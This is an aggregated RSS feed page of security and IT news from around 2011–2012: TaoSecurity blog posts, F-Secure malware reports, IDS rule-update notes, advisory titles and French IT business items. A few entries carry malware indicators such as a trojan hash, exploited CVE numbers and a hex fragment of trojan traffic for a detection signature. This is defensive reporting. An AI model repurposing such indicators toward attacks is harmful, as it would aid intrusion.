Erik Hjelmvik was kind enough to send an evaluation copy of the latest version of his NetworkMiner traffic analysis software. You can download the free edition from SourceForge as well. I first mentioned NetworkMiner on this blog in September 2008.

NetworkMiner is not a protocol analyzer like Wireshark. It does not take a packet-by-packet approach to representing traffic. Instead, NetworkMiner displays traffic in any one of the following ways: as hosts, frames, files, images, messages, credentials, sessions, DNS records, parameters, keywords, or cleartext. To demonstrate a few of these renderings, I asked NetworkMiner to parse the sample pcap from a sample lab from TCP/IP Weapons School 2.0. I did not need to install it; the software starts from a single executable and loads several DLLs in the associated directory.

The following screen capture shows information from the Hosts tab, showing what NetworkMiner knows about 192.168.230.4.



Notice that in addition to summarizing information about traffic to and from the host, in terms of packets or sessions, we also see what NetworkMiner knows about the host, like Queried NetBIOS names, Web Browser User Agents, and so on.

The following screen capture shows the Files tab. This displays all the content that NetworkMiner extracted from the traffic to the analysis workstation hard drive (or in my case, the NetworkMiner USB thumb drive).



I think NetworkMiner is pretty cool, especially given what you can do with the free version. My primary recommendation for improvement would be an interface that allows the user to easily pivot from one piece of information to the next. With the current environment, the analyst seems confined to the tab at hand. I would like to see a way to right click on an element of the displayed information and then execute a query based on my selection. It would also be helpful to be able to right click and open associated data in another traffic analysis program like Wireshark.

Thank you to Erik Hjelmvik for the opportunity to take another look at NetworkMiner!

Channel Image14:56 Tripwire Names Bejtlich #1 of "Top 25 Influencers in Security"» TaoSecurity
I've been listed in other "top whatever" security lists a few times in my career, but appearing in Tripwire's Top 25 Influencers in Security You Should Be Following today is pretty cool! Tripwire is one of those technologies and companies that everyone should know. It's almost like the "Xerox" of security because so many people equate the idea of change monitoring with Tripwire. So, I was happy to see my twitter.com/taosecurity feed and the taosecurity.blogspot.com blog make their cut.

David Spark asked for my "security tip for 2012," which I listed as:

Improve your incident detection and response program by answering two critical questions:

1. How many systems have been compromised in any given time period; and

2. How much time elapsed between incident identification and containment for each system?

Use the answers to improve and guide your overall security program.


Those of you on the securitymetrics mailing list, and a few other places, have heard me speaking about this topic. I'll probably blog about it in the future, but suffice it to say that those are the key issues you should address in 2012 in my opinion.

Channel Image14:56 Trimestriels Lenovo : Bénéfices en forte hausse mais le marché du PC ralentit» Actualités Poste de travail
Pour son 1er trimestre fiscal, achevé fin juin, Lenovo a réalisé un chiffe d'affaires (CA) de 5,9 milliards de dollars US, en hausse de 15%. Le bénéfice (...)
Channel Image14:56 Trimestriels Dell : le chiffre d'affaires se maintient, les services progressent» Actualités Poste de travail
Dell publie les résultats de son deuxième trimestre fiscal 2012. Le chiffre d'affaires (CA) se monte à 15,7 milliards de dollars (Md$) en hausse de 1% (...)
Channel Image14:56 Trimestriels Alcatel-Lucent : des bons résultats sanctionnés en bourse» Actualités Réseaux
L'équipementier télécoms a annoncé un chiffre d'affaires de 3,9 milliards d'euros au second trimestre 2011, en croissance de 2,4% sur un an (+10,4% à changes (...)
Channel Image14:56 Thoughts on 2011 ONCIX Report» TaoSecurity
Many of you have probably seen coverage of the 2011 ONCIX Reports to Congress: Foreign Economic and Industrial Espionage. I recommend every security professional read the latest edition (.pdf). I'd like to highlight the key findings of the 2011 version:

Pervasive Threat from Adversaries and Partners

Sensitive US economic information and technology are targeted by the intelligence services, private sector companies, academic and research institutions, and citizens of dozens of countries.

• Chinese actors are the world’s most active and persistent perpetrators of economic espionage. US private sector firms and cybersecurity specialists have reported an onslaught of computer network intrusions that have originated in China, but the IC cannot confirm who was responsible.

• Russia’s intelligence services are conducting a range of activities to collect economic information and technology from US targets.

• Some US allies and partners use their broad access to US institutions to acquire sensitive US economic and technology information, primarily through aggressive elicitation and other human intelligence (HUMINT) tactics. Some of these states have advanced cyber capabilities.


What's so significant about that section? The ONCIX is naming names right from the start, and concentrating squarely on China and Russia.

Contrast the 2011 approach with the 2008 report. If you search for "China" in the 2008 edition, you'll see only these sections in the main body of the report:


  • China and Russia accounted for a considerable portion of foreign visits to DOE facilities during FY 2008.

  • China continues to be a leading competitor in the race for clean coal technology.

  • The DNI Open Source Center (OSC) contributes to the CI community’s effort against
    China by monitoring foreign-language publications and Web sites for indications of
    threats and sharing this information with appropriate agencies, including law
    enforcement.



That's very different from the direct approach taken in 2011. However, if you check "Appendix B: Selected Arrests and Convictions for Economic Collection and Industrial Espionage Cases in FY 2008," in the 2008 report, you find China listed as the perpetrator of 7 of the 23 cases! So, although China has been an active threat for many years, only now is the ONCIX shining the spotlight on that country (along with Russia) as primary threats to US secrets and intellectual property.

Channel Image14:56 The current state of styli and the iPad: does the stylus still blow it?» OSNews
"Reading Steve Jobs by Walter Isaacson, it can be argued the creative catalyst for the iPad was not Jobs himself, nor Apple design wizard Jony Ive, but instead some Microsoft engineer who talked too much at parties. At least that's how Steve Jobs told it from 2002. 'But he was doing the device all wrong. It had a stylus. As soon as you have a stylus, you're dead. This dinner was like the tenth time he talked to me about it, and I was so sick of it that I came home and said, "Fuck it, let's show him what a tablet can really be".' Apocryphal dinner story or not, Apple did indeed show Microsoft how tablets are done, and attempted to bury the stylus in doing so. However, a decade later and just after the launch of the new iPad, it turns out the stylus isn't dead at all. In fact, it's getting better."
Channel Image14:56 The Toughest Question in Digital Security» TaoSecurity
The toughest question in digital security is "who cares?"

The recent Tweet by hogfly (@4n6ir) made me ponder this question. He points to an Aviation Week story by David Fulghum, Bill Sweetman, and Amy Butler titled China's Role In JSF's Spiraling Costs. It says in part:

How much of the F-35 Joint Strike Fighter’s spiraling cost in recent years can be traced to China’s cybertheft of technology and the subsequent need to reduce the fifth-generation aircraft’s vulnerability to detection and electronic attack?

That is a central question that budget planners are asking, and their queries appear to have validity. Moreover, senior Pentagon and industry officials say other classified weapon programs are suffering from the same problem. Before the intrusions were discovered nearly three years ago, Chinese hackers actually sat in on what were supposed to have been secure, online program-progress conferences, the officials say.

The full extent of the connection is still being assessed, but there is consensus that escalating costs, reduced annual purchases and production stretch-outs are a reflection to some degree of the need for redesign of critical equipment. Examples include specialized communications and antenna arrays for stealth aircraft, as well as significant rewriting of software to protect systems vulnerable to hacking.

It is only recently that U.S. officials have started talking openly about how data losses are driving up the cost of military programs and creating operational vulnerabilities, although claims of a large impact on the Lockheed Martin JSF are drawing mixed responses from senior leaders. All the same, no one is saying there has been no impact.

While claiming ignorance of details about effects on the stealth strike aircraft program, James Clapper, director of national intelligence, says that Internet technology has “led to egregious pilfering of intellectual capital and property. The F-35 was clearly a target,” he confirms.

The point of this article is to question the impact, in business and operational terms, of the cyberwar China continues to prosecute against the West.

The toughest question in digital security is "who cares" because it is usually extremely difficult to determine the impact of an intrusion. Consider the steps required to define the business and operational impact of the theft of intellectual property (as one example -- there are many others).

  1. The victim must learn that an intrusion occurred.
  2. The victim must determine exactly what IP was stolen.
  3. The victim must understand the adversary's capability and intention to exploit the stolen IP.
  4. The victim must recognize when the adversary exploits the stolen IP by using it in an operational context.
  5. The victim must determine what countermeasures or changes in courses of actions are possible to mitigate the adversary's exploitation of the stolen IP.
  6. The victim must synthesize most or all of the previous points into an assessment of the business and operational cost of the IP theft.

Steps 1 and 2 are largely technical, but 3-6 are more business-focused. From what I have seen, everyone who is a victim in the ongoing cyberwar struggles to conduct "battle damage assessment" (BDA) for digital intrusions. Articles like the one I cited are examples showing how difficult it is to determine if anyone should care about China's exploitation of Western IP.

Channel Image14:56 The Apple of today and the IBM of 1989» OSNews
I'm currently reading Jerry Kaplan's excellent book "Startup: a Silicon Valley adventure". In this book, Kaplan, founder and CEO of GO Corp., details the founding, financing and eventual demise of his highly innovative company, including the development and workings of their product. What's so surprising about this book is just how timeless it really is - the names and products may have changed, but the business practices and company attitudes surely haven't.
Channel Image14:56 Telling a Security Story with Charts» TaoSecurity
The image at left appeared in the 31 December 2011 edition of The Economist magazine in the article Economics focus -- How to get a date: The year when the Chinese economy will truly eclipse America’s is in sight. It depicts 15 measurements of the US and Chinese economies, with historical and projected data. There is a version available at this page with more statistics comparing the two nations.

The Economist presents these charts for the following reason:

In the spring of 2011 the Pew Global Attitudes Survey asked thousands of people worldwide which country they thought was the leading economic power. Half of the Chinese polled reckoned that America remains number one, twice as many as said “China”. Americans are no longer sure: 43% of US respondents answered “China”; only 38% thought America was still the top dog. The answer depends on which measure you pick. (emphasis added)

The reason I like these charts is that they remind me of how many security practitioners think about "being secure." Managers likely often ask security staff "Are we secure?" The truth is there is no single number, so anyone selling you a "risk" number is wasting your time (and probably your money). However, it would be much more useful to display a chart like that created by the Economist. The security staff could choose a dozen or more simple metrics to paint a picture, and let the viewer interpret the answer using his or her own emphasis and bias.

Another reason I like the Economist chart is that the magazine built it using specified assumptions of future activity, listed in the article. If you disagree with these assumptions you can visit the second link I posted to devise your own charts. Although not shown here, what would be even more useful is showing these charts as a time series, with snapshots for January, then February, and so on. This "small multiples" approach (promoted by Tufte) capitalizes on the skill of the human eye and brain to observe and observe differences in similar objects.

If you had to pick a dozen or so indicators of security for a chart, what would you depict? The two I consider non-negotiable are 1) incidents per unit time and 2) time to containment for incidents.

Channel Image14:56 TaoSecurity Blog Wins Most Educational Security Blog» TaoSecurity
I'm pleased to announce that TaoSecurity Blog won Most Educational Security Blog at the 2012 Social Security Bloggers Awards. I attended the event held near RSA and spent time talking with a lot of security bloggers and security people in general.

I'd like to thank the sponsors of the event, depicted on the photo of the back of the T-shirt at left. Props to whomever designed the shirt -- it's one of my favorites. The award itself looks great, and the gift certificate to the Apple store will definitely help with an iPad 3, as intended!

Long-time readers may remember that I won Best Non-Technical Blog at the same event in 2009.

Winning this award has given me a little more motivation to blog this year. I admit that communicating via Twitter as @taosecurity is much more seductive due to the presence of followers and the immediate feedback!

Speaking of Twitter, SC Magazine named @taosecurity as one of their 5 to follow, which I appreciate.

And speaking of SC Magazine, they awarded my company Mandiant their best security company award.


Channel Image14:56 Tao of Network Security Monitoring, Kindle Edition» TaoSecurity
I just noticed there is now a Kindle edition of my first book, The Tao of Network Security Monitoring: Beyond Intrusion Detection, published in July 2004. Check out what I wrote in the first paragraphs now available online.


Welcome to The Tao of Network Security Monitoring: Beyond Intrusion Detection. The goal of this book is to help you better prepare your enterprise for the intrusions it will suffer. Notice the term "will." Once you accept that your organization will be compromised, you begin to look at your situation differently. If you've actually worked through an intrusion -- a real compromise, not a simple Web page defacement -- you'll realize the security principles and systems outlined here are both necessary and relevant.

This book is about preparation for compromise, but it's not a book about preventing compromise. Three words sum up my attitude toward stopping intruders: prevention eventually fails. Every single network can be compromised, either by an external attacker or by a rogue insider. Intruders exploit flawed software, misconfigured applications, and exposed services. For every corporate defender, there are thousands of attackers, enumerating millions of potential targets. While you might be able to prevent some intrusions by applying patches, managing configurations, and controlling access, you can't prevail forever. Believing only in prevention is like thinking you'll never experience an automobile accident. Of course you should drive defensively, but it makes sense to buy insurance and know how to deal with the consequences of a collision.

Once your security is breached, everyone will ask the same question: now what? Answering this question has cost companies hundreds of thousands of dollars in incident response and computer forensics fees. I hope this book will reduce the investigative workload of your computer security incident response team (CSIRT) by posturing your organization for incident response success. If you deploy the monitoring infrastructure advocated here, your CSIRT will be better equipped to scope the extent of an intrusion, assess its impact, and propose efficient, effective remediation steps. The intruder will spend less time stealing your secrets, damaging your reputation, and abusing your resources. If you're fortunate and collect the right information in a forensically sound manner, you might provide the evidence needed to put an intruder in jail.


I wrote that eight years ago, and thankfully my concept that "prevention eventually fails" (which I coined in that book) is finally gaining ground.
Channel Image14:56 Sun Java Security update» SUSE Security Announcements
22 Feb 2011
Channel Image14:56 Software AG s'offre Terracotta pour ses compétences Java et in-memory» Actualités Open Source
Pour doper les performances de sa plateforme de gestion des processus métiers (BPM), composées des offres désormais intégrées de webMethods et IDS Scheer/Aris, (...)


Channel Image14:56 SkySQL s'implante chez Virgin Mobile» Actualités Open Source
A l'occasion du salon Solutions Linux, SkySQL a annoncé avoir remporté le contrat du support des bases MySQL du quatrième opérateur de téléphonie mobile (...)


Channel Image14:56 SheerDNS / new / 16th Apr / (Other)» Security BugWare
SheerDNS Buffer Overflow and Directory Traversal
Channel Image14:56 Scientific Linux, the great distribution with the wrong name» OSNews
"Scientific Linux is an unknown gem, one of the best Red Hat Enterprise Linux clones. The name works against it because it's not for scientists; rather it's maintained by science organizations. Let's kick the tires on the latest release and see what makes it special."
Channel Image14:56 Samsung releases Galaxy S II ICS source code» OSNews
"Good news, open source enthusiasts: as they've done with pretty much every one of the Android phones and updates, Samsung has posted the open source code for the Ice Cream Sandwich version of the Galaxy S II's operating system. While the update itself is only available in Europe and South Korea, any international version of the i9100 can apply it, and with the open source code ROM builders and other modders will be able to do more advanced ports and advanced ROMs."
Channel Image14:56 SUSE security summary report» SUSE Security Announcements
16 Nov 2010
Channel Image14:56 SUSE security summary report» SUSE Security Announcements
30 Nov 2010
Channel Image14:56 SUSE security summary report» SUSE Security Announcements
09 Dec 2010
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
17 May 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
05 Apr 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
23 Dec 2010
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
06 Oct 2010
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
22 Feb 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
19 Apr 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
08 Feb 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
03 Nov 2010
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
25 Jan 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
11 Jan 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
21 Sep 2010
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
01 Apr 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
03 May 2011
Channel Image14:56 SUSE Security Summary Report» SUSE Security Announcements
25 Oct 2010
Channel Image14:56 SUSE Linux Enterprise 11 SP1 kernel update» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 SUSE Linux Enterprise 11 GA kernel update» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 SUSE Linux Enterprise 10 SP3 kernel update» SUSE Security Announcements
23 Sep 2010
Channel Image14:56 SMS Spam About Premium Value Service Circulating in Finland» F-Secure Antivirus Research Weblog
CERT-FI is warning about SMS messages being sent by GTradeInc which are about subscription confirmation to a premium value service. These messages are apparently being sent to random people who have not ordered such service or taken part in Facebook or other campaign that would ask phone numbers.

The SMS messages contain the following content:

Mainoskirje aktivoitu. Saat 3 mainosta/vko. Hinta 20e/kk, veloitetaan puhelinlaskussasi. Peruuta milloin tahansa ilmaiseksi, tekstaa: TXT5 PERU numeroon 17163.

A brief English translation is that an advertising campaign has been activated, the subscriber will receive three advertisements per week, price being 20€/month, cancellation can be done at any time for free.

It is still unclear whether an actual billing agreement has been made, and would people actually receive bills. Also, there have been claims that the cancellation message would actually cost 5€, which is possible as 17163 is in the paid SMS range.

According to CERT, no billing can be done without user approval. So people should not try to contact GTradeInc, and just ignore the messages and write a reclamation if additional charges appear in their phone bill.

However, contacting your phone operator might be wise to confirm that no billing agreement has been made with GTradeInc.

On 20/03/12 At 11:09 AM

Channel Image14:56 Rule & Firewall Updates Re-enabled» Bleeding Edge Threats
The botcc, dshield, comprised, and drop rules at: http://www.bleedingthreats.net/rules/ had not been updated since November 15. They were supposed to be updated nightly from various sources, including ShadowServer and DShield. I have re-enabled these automatic updates. Similarly, the firewall rules at: http://www.bleedingthreats.net/fwrules/ had not been updated since November 15, either. They were supposed to be updated nightly [...]
Channel Image14:56 Review of SSH Mastery Posted» TaoSecurity
Amazon.com just published my five star review of SSH Mastery by Michael W. Lucas. From the review:

This is not an unbiased review. Michael W. Lucas cites my praise for two of his previous books, and mentions one of my books in his text. I've also stated many times that MWL is my favorite technical author. With that in mind, I am pleased to say that SSH Mastery is another must-have, must-read for anyone working in IT. I imagine that most of us use OpenSSH and/or PuTTY every day, but I am sure each of us will learn something about these tools and the SSH protocol after reading SSH Mastery.

Channel Image14:56 Red Hat met à jour sa plate-forme de messagerie « real time » pour le Cloud» Actualités Open Source
« La version 2 apporte plusieurs fonctionnalités et améliore de manière significative les performances d'administration dans tous les domaines, » a déclaré (...)


Channel Image14:56 RecapIT : Google+ encore et toujours, Apple roi du smartphone, Avant-premières de la BlackHat» Actualités Open Source
Le mois de juillet va tirer sa révérence et le lecteur retiendra qu'un réseau social, Google +, a retenu une bonne partie de son attention. Cette semaine (...)


Channel Image14:56 RecapIT : Des résultats financiers records, Lion sort ses griffes, Acquisitions dans le réseau» Actualités Réseaux
Point de trêve estivale pour les sujets IT. Cette semaine, le mot d'ordre était record au regard des différentes publications des résultats des sociétés (...)
Channel Image14:56 Recap IT : Apple un géant à double visage et l'Open Source offensif» Actualités Open Source
A la veille du week-end pascal, petit retour sur les faits marquants dans le monde de l'IT. Cette semaine a été placée sous le signe des résultats financiers (...)


Channel Image14:56 RBN Rule Updates» Bleeding Edge Threats
http://www.bleedingthreats.net/rules/bleeding-rbn.rules http://www.bleedingthreats.net/rules/bleeding-rbn-BLOCK.rules Updated those to include the new Chinese additions to the RBN IP ranges, and split them out into 3 rules. First are the major nets that rbn owns where mass servers are. Second are the new chinese nets, and then third are the individual hosts. SOme of those are just routers, some are individual web or [...]
Channel Image14:56 Progress Database / new / 16th Apr / (Other)» Security BugWare
Progress Database unchecked buffer in BINPATHX leads to overflow
Channel Image14:56 Presentation JBoss AS: exploitation et sécurisation » Nouveautes HSC
Channel Image14:56 Presentation Aspects juridiques des tests d'intrusion » Nouveautes HSC
Channel Image14:56 Presentation Agrégation et rétro-propagation du risque » Nouveautes HSC
Channel Image14:56 Practical Malware Analysis Book Promotion» TaoSecurity
I'm very pleased to share news of an awesome new book titled Practical Malware Analysis by Michael Sikorski and Andrew Honig. The authors will present a Webinar on their book on Wednesday 29 February at 2 pm eastern. I was pleased to write the foreword, which ends with these words:

If the malware authors are ready to provide the samples, the authors of the book you’re reading are here to provide the skills. Practical Malware Analysis is the sort of book I think every malware analyst should keep handy. If you’re a beginner, you’re going to read the introductory, hands-on material you need to enter the fight. If you’re an intermediate practitioner, it will take you to the next level. If you’re an advanced engineer, you’ll find those extra gems to push you even higher—and you’ll be able to say “read this fine manual” when asked questions by those whom you mentor.

Practical Malware Analysis is really two books in one—first, it’s a text showing readers how to analyze modern malware. You could have bought the book for that reason alone and benefited greatly from its instruction. However, the authors decided to go the extra mile and essentially write a second book. This additional tome could have been called Applied Malware Analysis, and it consists of the exercises, short answers, and detailed investigations presented at the end of each chapter and in Appendix C. The authors also wrote all the malware they use for examples, ensuring a rich yet safe environment for learning.

Therefore, rather than despair at the apparent asymmetries facing digital defenders, be glad that the malware in question takes the form it currently does. Armed with books like Practical Malware Analysis, you’ll have the edge you need to better detect and respond to intrusions in your enterprise or that of your clients. The authors are experts in these realms, and you will find advice extracted from the front lines, not theorized in an isolated research lab. Enjoy reading this book and know that every piece of malwareyou reverse-engineer and scrutinize raises the opponent’s costs by exposing his dark arts to the sunlight of knowledge.

To announce the book, the publisher is running this promotion: Use discount code REVERSEIT to get 40% off Practical Malware Analysis. One week only! Free ebook with all print book purchases.

The authors also started a new blog at practicalmalwareanalysis.com.

Channel Image14:56 Outil : dislocker - Dislocker » Nouveautes HSC
Channel Image14:56 Outil : administration JBoss AS - jis & wis » Nouveautes HSC
Channel Image14:56 Outil : Webef v0.5 Nouvelle version - Webef » Nouveautes HSC
Channel Image14:56 Outil : Patator v0.3 Nouvelle version - Patator » Nouveautes HSC
Channel Image14:56 Outil : Patator - Patator » Nouveautes HSC
Channel Image14:56 Oracle/Google : les dommages sur Java estimés jusqu'à 6,1 milliards de dollars» Actualités Open Source
Selon un document du tribunal fourni à Google, un expert diligenté par Oracle sur le litige concernant les viols de brevets Java par l'éditeur web, le (...)


Channel Image14:56 Oracle's final damage claim less than $100 million» OSNews
Some people (you know who) predicted the Oracle-Google lawsuit would spell doom for Google and Android. Well, turns out this was all a huge fuss over nothing. Oracle's damages claim started at an idiotic $6 billion - but the final claim is less than $100 million. Oracle's patent trolling is turning into a huge failure of epic proportions.
Channel Image14:56 Oracle remet le code d'OpenOffice.org à Apache» Actualités Open Source
Mettant fin aux spéculations sur le sort dOpenOffice.org, Oracle a annoncé soudainement il y a deux jours qu'il transférait à la fondation Apache le code (...)


Channel Image14:56 Oracle livre la bêta de JavaFX 2.0» Actualités Open Source
L'équipe Java d'Oracle vient de livrer la version beta de JavaFX 2.0, une mise à jour majeure de l'environnement de développement d'applications Internet (...)


Channel Image14:56 Nulprot Trojan Sig» Bleeding Edge Threats
Interesting Nulprot trojan. It’s reply from an http get has a header field called Encryption:. That’s a new one: 0000 48 54 54 50 2f 31 2e 30 20 32 30 30 20 4f 4b 0d HTTP/1.0 200 OK. 0010 0a 45 6e 63 72 79 70 74 69 6f 6e 3a [...]
Channel Image14:56 Netgear / new / 16th Apr / (Other)» Security BugWare
Netgear routers logging vulnerability
Channel Image14:56 National Public Radio Talks Chinese Digital Espionage» TaoSecurity
When an organization like National Public Radio devotes an eleven minute segment to Chinese digital espionage, even the doubters have to realize something is happening. Rachel Martin's story China's Cyber Threat A High-Stakes Spy Game is excellent and well worth your listening (.mp3) or reading time.

Rachel interviews three sources: Ken Lieberthal of the Brookings Institution, Congressman Mike Rogers (chairman of the House Intelligence Committee), and James Lewis from the Center for Strategic and International Studies.

If you listen to the report you'll hear James Lewis mention "a famous letter from three Chinese scientists to Deng Xiaoping in March of 1986 that says we're falling behind the Americans. We're never going to catch up unless we make a huge investment in science and technology."

James is referring to the so-called 863 Program (Wikipedia). You can also read directly from the Chinese government itself here, e.g.:

In 1986, to meet the global challenges of new technology revolution and competition, four Chinese scientists, WANG Daheng, WANG Ganchang, YANG Jiachi, and CHEN Fangyun, jointly proposed to accelerate China’s high-tech development. With strategic vision and resolution, the late Chinese leader Mr. DENG Xiaoping personally approved the National High-tech R&D Program, namely the 863 Program.

Implemented during three successive Five-year Plans, the program has boosted China’s overall high-tech development, R&D capacity, socio-economic development, and national security.

In April 2001, the Chinese State Council approved continued implementation of the program in the 10th Five-year Plan. As one of the national S&T program trilogy in the 10th Five-year Plan, 863 Program continues to play its important role.

1. Orientation and Objectives

Objectives of this program during the 10th Five-year Plan period are to boost innovation capacity in the high-tech sectors, particularly in strategic high-tech fields, in order to gain a foothold in the world arena; to strive to achieve breakthroughs in key technical fields that concern the national economic lifeline and national security; and to achieve “leap-frog” development in key high-tech fields in which China enjoys relative advantages or should take strategic positions in order to provide high-tech support to fulfill strategic objectives in the implementation of the third step of our modernization process.


There's more to read, but that gives you a sense of what the "letter" involves.

I hope this NPR story helps some of you realize that the China threat is not "hype." Consider Dr Lieberthal in relation to Chairman Rogers and Jim Lewis. You can decide to try to refute their positions by saying that the Chairman has "an agenda," and Mr Lewis is essentially too distant from the problem. I personally think Chairman Rogers is right on the money, but I sometimes question where Mr Lewis gets his information.

Dr Lieberthal, however, is one of the world's finest minds regarding China (Wikipedia entry), and he served in the Clinton administration. He even wrote a book on how to achieve corporate success in China (Managing the China Challenge: How to Achieve Corporate Success in the People's Republic). He is not a "China hawk" trying to start some kind of "war" with the Chinese, yet he takes the threat seriously enough to discuss the countermeasures he takes when visiting China ten times a year. Do those who doubt the China threat still believe it's all "hype"?

Channel Image14:56 NB 1300 modem/router / new / 16th Apr / (Other)» Security BugWare
NB 1300 modem/router password remotely accessible
Channel Image14:56 MySQL s'implante chez Virgin Mobile» Actualités Open Source
A l'occasion du salon Solutions Linux, SkySQL a annoncé avoir remporté le contrat du support des bases MySQL du quatrième opérateur de téléphonie mobile (...)


Channel Image14:56 Mozilla security issues» SUSE Security Announcements
05 May 2011
Channel Image14:56 Mozilla Suite security problems» SUSE Security Announcements
08 Nov 2010
Channel Image14:56 Mozilla Firefox security update» SUSE Security Announcements
05 Jul 2011
Channel Image14:56 Mozilla Firefox security update» SUSE Security Announcements
12 Oct 2010
Channel Image14:56 Mozilla Browser security problems» SUSE Security Announcements
05 Jan 2011
Channel Image14:56 Motorola Mobility peut-il contribuer à imposer Google dans l'entreprise» Actualités Poste de travail
Google n'a pas ménagé ses efforts pour tenter de s'imposer dans l'entreprise. Mais, selon les analystes, il reste à voir si son acquisition de Motorola (...)
Channel Image14:56 Most Malware Executables are small….» Bleeding Edge Threats
Martin Holste sent in an inspired idea. Since the vast majority of malware executables downloaded via http are small, why don’t we look for anything small? (actual numbers from several malware collections show an average just under 500kb). Great idea. It won’t catch everything, but it’ll do a lot. The complication is we have to rely [...]
Channel Image14:56 More rss feeds from SecurityFocus» SecurityFocus News
News, Infocus, Columns, Vulnerabilities, Bugtraq ...
Channel Image14:56 Microsoft's Guidance on CVE-2012-0002» F-Secure Antivirus Research Weblog
First: Microsoft's Remote Desktop Protocol is disabled on Windows by default. So most computers are unaffected by issues highlighted as a result of the month's "Patch Tuesday". However: If you administer RDP enabled workstations — then you probably should read Microsoft's Security Research & Defense post about CVE-2012-0002.

CVE-2012-0002

CVE-2012-0002 was privately reported to Microsoft, and there are no reports of it being exploited in the wild. But it's only a matter of time before the patch is reverse, and this vulnerability is exploitable.

So read Microsoft's post, schedule, test, and deploy. And do it sooner than later.

On 14/03/12 At 01:03 PM

Channel Image14:56 Microsoft veut une plus grande intégration d'Hyper-V dans le noyau Linux» Actualités Open Source
« Microsoft a été le cinquième plus grand contributeur au noyau Linux version 3.0 » explique sur son blog le développeur Open Source et chercheur en informatique, (...)


Channel Image14:56 Microsoft censors Pirate Bay links in Windows Live Messenger» OSNews
"The Pirate Bay is not only the most visited BitTorrent site on the Internet, but arguably the most censored too. Many ISPs have been ordered to block their customers’ access to the website, and recently Microsoft joined in on the action by stopping people sharing its location with others. Microsoft's Windows Live Messenger now refuses to pass on links to The Pirate Bay website, claiming they are unsafe." They refuse links to The Pirate Bay. In that light, here are a bunch of completely and utterly useless links to The Pirate Bay. And some more. And then some. Update: We have some more links to The Pirate Bay.
Channel Image14:56 Microsoft ajoute le support d'Hadoop à SQL Server et PDW» Actualités Open Source
La réponse de Microsoft au phénomène des « Big Data » consiste à apporter à sa base de données SQL Server et à sa plateforme Parallel Data Warehouse le (...)


Channel Image14:56 Microsoft ajoute le support d'Hadoop à SQL Server» Actualités Open Source
La réponse de Microsoft au phénomène des « Big Data » consiste à apporter à sa base de données SQL Server et à sa plateforme Parallel Data Warehouse le (...)


Channel Image14:56 Mark Rasch: Lazy Workers May Be Deemed Hackers» SecurityFocus News
Lazy Workers May Be Deemed Hackers

>> Advertisement <<
Can you answer the ERP quiz?
These 10 questions determine if your Enterprise RP rollout gets an A+.
http://www.findtechinfo.com/as/acs?pl=781&ca=909
Channel Image14:56 Mark Rasch: Hacker-Tool Law Still Does Little» SecurityFocus News
Hacker-Tool Law Still Does Little
Channel Image14:56 Mandiant Webinar Wednesday; Help Us Break a Record!» TaoSecurity
I'm back for the last Mandiant Webinar of the year, titled State of the Hack: It's The End of The Year As We Know It - 2011. And you know what? We feel fine! That's right, join Kris Harms and me Wednesday at 2 pm eastern as we discuss our reactions to noteworthy security stories from 2011.

Register now and help Kris and me beat the attendee count from last month's record-setting Webinar.

If you have questions about and during the Webinar, you can always send them via Twitter to @mandiant and use the hashtag m_soh.

Channel Image14:56 Macromedia Flash Ads clickTAG / new / 16th Apr / (Other)» Security BugWare
Macromedia Flash ad user tracking field xss and session retrieval
Channel Image14:56 Mac Malware at the Moment» F-Secure Antivirus Research Weblog
It's been a while since we last wrote about Mac malware, so I thought it would be good to give our readers an update on what's been happening during the last few months. Last year we detailed a possible Mac trojan in the making. At that time we were still speculating whether it would be part of a bundle or just a standalone binary. Now it's clear: a new variant was discovered and it is a full-blown application, complete with an icon.

The author calls this variant version 1.0 ("FILEAGENTVer1.0" in little-endian) as seen from the binary's code:

FILEAGENTVer1.0

The sample I analyzed uses thumbnail images/icons of Irina Shayk, apparently taken from the March 2012 issue of FHM (South Africa) magazine. The malicious application bundle is being spread inside an archive file together with other images taken from the magazine hoping that its file type will be overlooked by users.

FHM Feb Cover Girl Irina Shayk H-Res Pics

Nothing else is new besides the implementation. The backdoor payload is still the same but uses a new C&C server. The server is currently active (at time of publication). It is important to take note that the new C&C server still points to the same IP address as the previous variant as mentioned by the folks at ESET. We have reported the server to CERT-FI. Hopefully they will be able notify the proper authorities.

We detect this new variant as Trojan-Dropper:OSX/Revir.C, MD5: 7DBA3A178662E7FF904D12F260F0FFF3.

Moving along — there's another more serious OS X malware threat lurking out there. The Flashback trojan, which first appeared around the same time as Revir, is still in the wild. It is using exploits to infect systems without user interaction. Though what it's exploiting are old Java vulnerabilities (CVE-2011-3544 and CVE-2008-5353), we might begin seeing a real OS X outbreak if the gang upgrades their operation a notch higher and start targeting unpatched vulnerabilities.

In a future post, I will detail how to locate a Flashback infection. In the meantime, the easiest way to avoid infection is to just disable Java from your browser(s). Based on our surveys, most users don't really need Java when browsing the Web. If for some reasons you do need Java, say for online banking, turn it on only when you need it. And then turn it off again after you're done.

In Safari, you can disable Java by unchecking "Enable Java" in Safari Preferences, Security tab.

Safari, Java settings

Or you can disable Java from the Snow Leopard (Lion doesn't come with Java by default) by going to Applications, Utilities, Java Preferences. Uncheck everything in the General tab.

Java Preferences

Regards,
Brod






On 19/03/12 At 02:47 PM

Channel Image14:56 MDVSA-2011:128: dhcp» Mandriva Security
Multiple vulnerabilities has been discovered and corrected in dhcp:

The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before
3.1-ESV-R3, and 4.1-ESV before 4.1-ESV-R3 allows remote attackers
to cause a denial of service (daemon exit) via a crafted DHCP packet
(CVE-2011-2748).

The server in ISC DHCP 3.x and 4.x before 4.2.2, 3.1-ESV before
